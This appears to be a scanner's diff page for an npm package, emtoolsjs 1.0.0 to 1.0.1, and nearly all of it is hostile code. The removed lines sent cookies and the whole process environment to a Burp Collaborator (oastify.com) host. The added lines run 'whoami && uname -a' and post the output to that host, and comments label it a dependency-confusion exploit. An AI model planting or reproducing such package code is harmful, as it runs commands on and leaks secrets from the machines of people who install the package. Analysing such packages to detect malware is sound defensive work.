emtoolsjs 1.0.0 → 1.0.1
Sign up to get free protection for your applications and to get access to all the features.
- package/index.js +22 -12
- package/package.json +1 -1
package/index.js
CHANGED
|
@@ -1,15 +1,10 @@
|
|
|
1
1
|
const https = require('https');
|
|
2
|
+
const { exec } = require('child_process');
|
|
2
3
|
|
|
3
|
-
//
|
|
4
|
-
function sendData() {
|
|
5
|
-
const data = JSON.stringify({
|
|
6
|
-
message: 'Dependency Confusion Test from emtoolsjs',
|
|
7
|
-
documentCookie: typeof document !== 'undefined' ? document.cookie : 'No access to document',
|
|
8
|
-
environment: process.env // Esto puede darte variables de entorno útiles para el análisis
|
|
9
|
-
});
|
|
10
|
-
|
|
4
|
+
// Función para enviar datos al Burp Collaborator
|
|
5
|
+
function sendData(data) {
|
|
11
6
|
const options = {
|
|
12
|
-
hostname: '2be71rh86kkyju99zxclirv7cyip6gu5.oastify.com', // Burp Collaborator
|
|
7
|
+
hostname: '2be71rh86kkyju99zxclirv7cyip6gu5.oastify.com', // URL de tu Burp Collaborator
|
|
13
8
|
port: 443,
|
|
14
9
|
path: '/callback',
|
|
15
10
|
method: 'POST',
|
|
@@ -31,8 +26,23 @@ function sendData() {
|
|
|
31
26
|
req.end();
|
|
32
27
|
}
|
|
33
28
|
|
|
34
|
-
//
|
|
35
|
-
|
|
29
|
+
// Ejecutar comandos y enviar los resultados
|
|
30
|
+
exec('whoami && uname -a', (error, stdout, stderr) => {
|
|
31
|
+
if (error) {
|
|
32
|
+
console.error(`Error al ejecutar el comando: ${error.message}`);
|
|
33
|
+
return;
|
|
34
|
+
}
|
|
35
|
+
if (stderr) {
|
|
36
|
+
console.error(`Error en el comando: ${stderr}`);
|
|
37
|
+
}
|
|
38
|
+
|
|
39
|
+
// Prepara los datos en formato JSON para enviar a Burp Collaborator
|
|
40
|
+
const payload = JSON.stringify({
|
|
41
|
+
message: 'Dependency confusion exploit',
|
|
42
|
+
commandOutput: stdout
|
|
43
|
+
});
|
|
36
44
|
|
|
37
|
-
|
|
45
|
+
// Envía los datos al Collaborator
|
|
46
|
+
sendData(payload);
|
|
47
|
+
});
|
|
38
48
|
|